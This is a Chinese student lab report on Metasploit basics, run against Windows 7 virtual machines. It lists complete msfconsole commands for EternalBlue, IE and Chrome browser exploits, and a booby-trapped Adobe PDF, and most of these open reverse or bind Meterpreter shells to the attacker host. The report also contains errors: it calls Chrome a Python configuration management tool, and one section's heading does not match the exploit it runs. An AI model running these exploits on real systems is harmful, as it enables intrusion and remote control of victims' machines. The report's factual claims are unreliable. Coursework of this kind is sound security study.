Exp6 MSF应用基础

Exp6 MSF应用基础

目录

一、实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。

1 一个主动攻击实践

使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

漏洞介绍
在微软官方的漏洞库中,有此漏洞的介绍与补丁,补丁编号:KB4013389。永恒之蓝相关病毒,其实是利用了微软的 MS17-010 漏洞。MS17-010 是 Windows 系统一个底层服务的漏洞,恶意代码会扫描开放 445 文件共享端口的 Windows 机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

本实验使用 Win7 作为靶机来进行渗透测试 Win7 环境说明:IP 地址 192.168.81.129 ,防火墙状态关闭。

0 安装Win7虚拟机

本实验使用了Win7英文版的虚拟机,因此需要大家安装一下。过程并不繁琐,文件在3个G左右

迅雷下载种子:

ed2k://|file|en_windows_7_ultimate_with_sp1_x64_dvd_u_677332.iso|3320903680|743598C64E635C72964CF02A3E0AD547|/ 

自行安装即可,如果使用VM,可以进行“简易安装”,实现一键部署。

1 攻击前的准备

1.1 关闭Win7防火墙

1.2 打开445端口

具体操作请参考:链接

1.3 查看靶机IP地址

ipconfig

2 执行攻击

我们先看一下,靶机是否有这个漏洞

nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.48.131这是Win7的地址 

结果如下,我们可以看到,有此漏洞

进入metasploit的命令是msfconsole
我们先看一下这个漏洞对应的MSF板块是哪些:

msf6 > search ms17_010 


下面选择对应MSF板块,设置靶机ip地址,执行攻击:

use exploit/windows/smb/ms17_010_eternalblue set rhost 192.168.123.53是Win7的IP地址 (因为后来改了net模式所以IP变了) exploit 

如上图所示,我们成功获得了目标主机的shell命令行,可以执行相关命令。

2 一个针对浏览器的攻击

ms06_013_createtextrange

kali(172.16.226.41)
靶机:Windows 7+IE 8(172.16.224.167)
攻击软件:metasploit

我们先看一下,靶机是否有这个漏洞

nmap -sS -A --script=smb-vuln-ms17-010 -PO 172.16.224.167这是Win7的地址 

然后开始进行相应的攻击

use exploit/windows/browser/ms10_018_ie_behaviors set payload windows/meterpreter/bind_tcp set RHOST 172.16.224.167 set target 0 exploit 

输入后显示

使用win7的IE浏览器访问http://172.16.226.41:8080/ZtEpqyZhDUplovN

浏览器显示从1跳到100最后报网页错误。

CVE-2019-5786漏洞

机器 系统 ip 软件
靶机 Win7x86 192.168.48.133 Chrome_(32bit)_v72.0.3626.119
攻击机 kali 192.168.48.130

Chrome:是基于Python开发的一套C/S架构配置管理工具,是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,基于Python语言实现,结合轻量级消息队列(ZeroMQ)与Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建。
漏洞原因:由于微软在windows 7上并未实现win32k Lockdown机制,因此win7系统中的Chrome沙盒并不能充分防御win32k漏洞的利用。攻击者利用该漏洞配合一个win32k.sys的内核提权(CVE-2019-0808 )可以在win7上穿越Chrome沙箱。
利用方法:攻击者设置监听,欺骗受害者打开或重定向到特制网页,进入会话完成攻击。

配置靶机

先装个x86的win7,我的版本是cn_windows_7_ultimate_with_sp1_x86_dvd_u_677486.iso
下载Chrome 链接:https://dl.lancdn.com/landian/soft/chrome/m/old-version/

攻击过程

攻击机端进入msf控制台,输入如下指令

use exploit/windows/browser/chrome_filereader_uaf set payload windows/meterpreter/reverse_tcp set URIPATH / set LHOST 192.168.48.130 exploit 


靶机端在浏览器安装目录的文件夹开cmd输入C:\Program Files\Google\Chrome\Application>chrome.exe --no-sandbox以沙箱关闭的状态执行chrome.exe,在地址栏输入地址http://192.168.48.130:8080

chrome

3 一个针对客户端的攻击,以 adobe reader 为例

漏洞:adobe_cooltype_sing
此处使用群里发的安装包

安装好后使用

use exploit/windows/fileformat/adobe_cooltype_sing //进入攻击模块 set payload windows/meterpreter/reverse_tcp //选择攻击载荷 set LPORT 1227 set FILENAME 20191227.pdf set target 0 exploit 


把这个文件传到 win7 中
然后,我们进行监听,在 msfconsole 里输入 back,可以返回上一级
然后输入:

use exploit/multi/handler //进入监听模块 set payload windows/meterpreter/reverse_tcp //选择攻击载荷 set LHOST 192.168.48.130 //设置攻击机 IP 地址 set LPORT 1227 //设置端口号 exploit //攻击 

这时候我们在 win7 中用有漏洞的adobePDFreaderder打开那个 pdf 文件

攻击成功。

4 辅助模块的使用

使用PortScan进行端口扫描
靶机:win7 x64 192.168.48.131
kali:192.168.48.130

命令如下:

use auxiliary/scanner/portscan/tcp show options set rhosts 192.168.48.131 exploit 

我们可以看到,metasploit帮助我们获取了目标已经开放的端口,由此我们可以推测出靶机可能存在的漏洞和可能提供的服务,进而完成后续攻击。

二、问题回答

1 用自己的话解释什么是exploit,payload,encode

Exploit模块

是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问权的代码组件。 形象点来说就是攻击模块 

Payload模块

是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。

三种 payload:/usr/share/metasploit-framework/modules/payloads/     Single:all-in-one     Stager:目标计算机内存有限时,先传输一个较小的 payload 用于建立连接     Stages:利用 stager 建立的连接下载的后续payload 

Encoder模块

针对payload进行编码,可以通过多种编码手段、多次编码方式有效的改变payload代码特征 不改变payload作用,但能对payload进行加工 

2 实践总结与体会

经过前三个实验的锤炼,这次实验显得较为得心应手,除了攻击浏览器chrome,它竟然会自动更新,我卡了好久没有解决,最后请教了长兴学长,给我指明了错误,十分感谢。

3 离实战还缺哪些技术或步骤

缺少自己分析漏洞的技术

参考:李长兴学长——CVE-2019-5786漏洞复现